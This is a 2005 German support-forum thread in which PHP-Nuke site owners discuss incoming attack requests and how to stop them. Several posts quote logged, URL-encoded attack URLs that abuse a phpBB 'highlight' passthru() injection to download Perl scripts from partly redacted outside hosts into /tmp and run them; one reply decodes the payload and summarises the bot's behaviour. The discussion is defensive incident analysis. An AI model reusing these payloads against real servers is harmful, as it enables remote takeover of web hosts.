Nur Text | Text mit Bildern

pragmaMx Support Forum

Archive => veraltete bzw. unsupportete Systeme und Module => Alt Archive => PHPNuke 5.2-6.0 & VKP 5.5 => Thema gestartet von: soxin am 07 Januar 2005, 00:37:04

Titel: Hacker unterwegs...
Beitrag von: soxin am 07 Januar 2005, 00:37:04
Hi,
seit tagen werden meine Nukeseiten bombadiert mit Hackangriffen.

Wer hat noch dieses Problem???

Sie versuchen über  /modules.php?op=modload&rush über wget eine datei reinzuladen..

Zum Glück ist das bis jetzt noch nicht passiert..

Einige Auszüge:

ZitatIP: 83.246.112.26
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0AXXXX.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget%20xxxxx.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611112;rm%20sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611111;rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';

ZitatIP: 130.230.88.16
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0AXXXXX.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget%20atxxxxx.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611112;rm%20sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611111;rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';

ZitatIP: 212.100.254.201
  URL: /modules.php?op=modload&rush=echo%20_START_%3B%20cd%20/tmp;wget%20%0AXXXXX.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget%20xxxxx.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611112;rm%20sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611111;rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527\';

ZitatURL: /modules.php?op=modload&rush=echo%20_START_%3B%20cd%20/tmp;wget%20%0AXXXXX.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget%20xxxxx.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611112;rm%20sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611111;rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527\';

Zitat  IP: 210.245.161.135
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0AXXXXX.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget%20xxxxx.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611112;rm%20sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611111;rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';

Zitat  IP: 65.75.177.60
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0AXXXXX.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget%20xxxxx.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611112;rm%20sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611111;rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';


Hat jemand eine Ahnung was damit erreicht wird.. ??

Wie kann ic´h solche Hackangriffe abwehren?
8O DANKE
Titel: Re: Hacker unterwegs...
Beitrag von: jubilee am 07 Januar 2005, 10:02:01
Hallo !
Ich würde fast sagen, er versucht eine Session-Datei in Dein /tmp-Verzeichnis hochzuladen.
Zitat
/modules.php?op=modload&rush=echo _START_; cd /tmp;
wget XXXXX.com/.zk/sess_189f0f0889555397a4de5485dd611111;
wget XXXXX.com/.zk/sess_189f0f0889555397a4de5485dd611112;
perl sess_189f0f0889555397a4de5485dd611112;
rm sess_189f0f0889555397a4de5485dd611112;
perl sess_189f0f0889555397a4de5485dd611111;
rm sess_189f0f0889555397a4de5485dd611111; echo _END_&
highlight==passthru($HTTP_GET_VARS[rush]);

(urldecode("%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20") = echo _START_;)
(urldecode("%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&) = ; echo _END_&  )
( urldecode "%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\'") = =%27.passthru($HTTP_GET_VARS[rush]).%27  )
Versucht also jemand Dir eine fremde Session unterzujubeln.
Dass hier keine Misverständnisse aufkommen. In diesen Dateien stehen keine Sessioninformationen. Sie sehen nur wie Session-Dateien aus. Ich habe die Qiuelltexte der Dateien und es sind recht umfangreiche Perl-Scripte die schon einiges bewirken können.
Kann beim vkpmx nix passieren weil die Session in der Datenbank gespeichert wird.
Trotzdem @Tora: Wir sollten uns mal mit den anderen kurzschließen (rio z.B. ) ob da Potential drinne steckt.
Evt auch eine alte Sache, ich habs aber auf die Schnelle nicht gefunden,.
Den Servernamen habe ich ausgeixt, damit niemand auf "Gedanken" kommt.

MfG
jubilee
Titel: Re: Hacker unterwegs...
Beitrag von: NeMeSiSX2LC am 07 Januar 2005, 17:58:25
Soweit ich es noch weiss nutzt soxin kein MX
Titel: Re: Hacker unterwegs...
Beitrag von: RiotheRat am 07 Januar 2005, 18:13:58
Moin jubilee,

ICQ ist an und meine neue Telenummer jag ich Dir mal per PN rüber ... liest sich erstmal bedenklich. Und die PERL-Schiene scheint sich zu verbreiten, ich denke da an die letzte Sache mit dem Highlight-Parser vom phpBB.

Liest sich erstmal nicht nach Script-Kiddie ...

RtR
Titel: Re: Hacker unterwegs...
Beitrag von: Andi am 07 Januar 2005, 19:56:08
Moin :)

denke das ist immernoch der phpBB Exploit, in etwas abgewandelter Form.
Habe über Google folgende Seiten über das Thema gefunden:
http://voidmain.is-a-geek.net/forums/viewtopic.php?p=8501
http://castlecops.com/article5642.html

Unter anderem ist mir bei der Suche sogar ein Pyton-Script begegnet....
Da ist ganz schön was im Busch.

Betrifft in Nuke-Systemen m.E. bis jetzt nur das phpBB-Forum.
Titel: Re: Hacker unterwegs...
Beitrag von: NeMeSiSX2LC am 07 Januar 2005, 19:57:02
Oder halt Nuke seiten mit dem alten bbport drinne oder nicht?
Titel: Re: Hacker unterwegs...
Beitrag von: Andi am 07 Januar 2005, 20:00:59
Zitat von: NeMeSiSX2LC am 07 Januar 2005, 19:57:02
Oder halt Nuke seiten mit dem alten bbport drinne oder nicht?
Hmm, eigentlich meinte ich das. Ob das ein port ist oder direkt in Nuke drin ist, da mache ich keinen Unterschied... Nuke halt....
Titel: Re: Hacker unterwegs...
Beitrag von: NeMeSiSX2LC am 07 Januar 2005, 20:04:59
PHP-Nuke ja weil mittlerwile gibts auch eine Nuke weiter entwicklung wo sowas nicht der Fall ist. Aber trotzdem den zusatz nuke haben. Nein ich mein nicht Postnuke
Titel: Re: Hacker unterwegs...
Beitrag von: jubilee am 07 Januar 2005, 20:09:33
Hmmm ....
Die haben das Suchmuster im einen Script ein wenig verschleiert.
In der Tat wird in Altavista nach einer topic.php gesucht.
Eines steht jedensfalls fest. Wer es schafft, das 2 Script auf einem Server zu aktivieren,
der kann auf dem Server machen, was er will.
Er versteckt sich und versucht das beenden des Scriptes zu verhindern :
Zitat$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
Portscan auf "21","22","23","25","53","80","110","143"
IRC-Server wird initiert...
Shellzugriff wird versucht bzw. Ausgaben werden umgeleitet...
Es werden auch diverse Socketverbindungen eingerichtet.
Ich denke das ist eine Vorstufe um den kompletten Server zu übernehmen.
Also weitab von den Spielchen nur einige Webseiten zu löschen ....
Mfg
jubilee
Titel: Re: Hacker unterwegs...
Beitrag von: Andi am 07 Januar 2005, 20:14:51
@ NeMeSiSX2LC

Die Verbreitung von vkpMx, cpg-Nuke, nsn-Nuke usw. ist im Vergleich zur Verbreitung des Originals so gering, dass sich niemand die Mühe machen wird, speziell diese Systeme zu knacken.

Also ist diese Namens-Haarspalterei völlig uninteressant.

Es gibt hunderttausende betroffene Seiten. Und welcher Newbie-Webmaster achtet schon darauf, ständig das neuste Update drauf zu haben?
Titel: Re: Hacker unterwegs...
Beitrag von: NeMeSiSX2LC am 07 Januar 2005, 20:22:47
NSN ist auch sicher hart *scherz* Ja hast schon recht. Man sieht es ja oft genug hier. Axo gibts eigentlich was nach DAU und vor Newbie :D
Titel: Re: Hacker unterwegs...
Beitrag von: soxin am 07 Januar 2005, 21:23:13
Also ich verwende eine umgebaute Version von VKP 5.5 und auf einer anderen Seite eine umgebaute Version von 6.x ...

Ich habe in den letzten 30 minuten ca. 50 sicherheitemails bekommen

ZitatIP: 66.194.75.151
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%xxx.com/~private/a.txt;wget%20sexxx.com/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';
  Refer:
  Date/Time: 07.01.05 / 21:05:48

IP: 80.190.192.103
  URL: /modules.php?op=modload&rush=echo%20_START_%3B%20cd%20/tmp;wget%20sexxx.com/~private/a.txt;wget%20sexxx.com/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527\';
  Refer:
  Date/Time: 07.01.05 / 20:57:08



IP: 69.30.194.70
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20xxx.com/~private/a.txt;wget%20sxxx.com/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';
  Refer:
  Date/Time: 07.01.05 / 20:51:33


IP: 66.79.176.210
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20xxx.com/~private/a.txt;wget%20xxx.com/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';
  Refer:
  Date/Time: 07.01.05 / 20:47:06


IP: 66.246.218.32
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20xxx.com/~private/a.txt;wget%xxx.com/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';
  Refer:
  Date/Time: 07.01.05 / 20:18:50

IP: 82.192.75.160
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%xxx.com/~private/a.txt;wget%xxx.com/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';
  Refer:
  Date/Time: 07.01.05 / 20:10:39


Passiert da eigentlich irgendwas?
op=modload gibt es das überhaupt bei phpnuke?

ich habe in die module.php das mal eingefügt:

if($op=="modload")
{
echo"**UPS** YOU ; I WILL GET YOU!!!";
die;
}

Weiß aber nicht ob das angezeigt wird..

hat jemand eine Odee wie ich das stoppen kann?
Danke
Titel: Re: Hacker unterwegs...
Beitrag von: Biker am 07 Januar 2005, 21:45:19
Jooooo...geht! ;)

(https://forum.pragmamx.org/proxy.php?request=http%3A%2F%2Fwww.biker-unity.de%2Fimages%2Fiupload%2Ffuckyou.jpg&hash=4c8162fe0fbc9725931981417cabca8027407589)

Gruß
Bernd
Titel: Re: Hacker unterwegs...
Beitrag von: Andi am 07 Januar 2005, 21:46:43
MOin Soxin  :)

modload ist ein Überbleibsel aus alten phpNuke Versionen und hat eigentlich keine Funktion mehr. Zur Kompatibilität wird es aber noch in der modules.php abgefragt (auch im vkpMx) . Verschiedene Module verwenden diesen Übergabeparameter auch noch, z.B. das eBoard.
Die Cracker könnten das modload in der URL also auch weglassen, das hat keine Auswirkung.

Lies mal hier:
http://board.pragmamx.de/index.php?topic=11736.0

Hier steht ein einfacher Weg um den entstehenden Traffic zu verringern:
http://board.pragmamx.de/index.php?topic=11734.0
Titel: Re: Hacker unterwegs...
Beitrag von: soxin am 07 Januar 2005, 21:52:17
Zitat von: Biker am 07 Januar 2005, 21:45:19
Jooooo...geht! ;)

(https://forum.pragmamx.org/proxy.php?request=http%3A%2F%2Fwww.biker-unity.de%2Fimages%2Fiupload%2Ffuckyou.jpg&hash=4c8162fe0fbc9725931981417cabca8027407589)

Gruß
Bernd

@Bernd
wenn ich das eingebe:
Zitat/modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%xxx.com/~private/a.txt;wget%xxx.com/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';

dann geht es leider nicht..

@Tora, danke
Leider bin ich nun nicht schlau daraus geworden.
Das mit dem phpbb ist mir bekannt da ich auch ein phpbb forum laufen lasse (http://www.skype-forum.com) ..
was hat das nun mit dem Nuke zu tun

Wie kann ich das
Zitat/modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%xxx.com/~private/a.txt;wget%xxx.com/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';
stoppen.. bzw. abfangen .. mit

if($op=="modload")
{
echo"**UPS** YOU ; I WILL GET YOU!!!";
die;
}

geht es leider nur teilweise.

P.S.: Ich liebe dieses Forum, auch wenn es sich schon sehr verändert hat..
Schaue hoch zu Sascha  :(
Nur Text | Text mit Bildern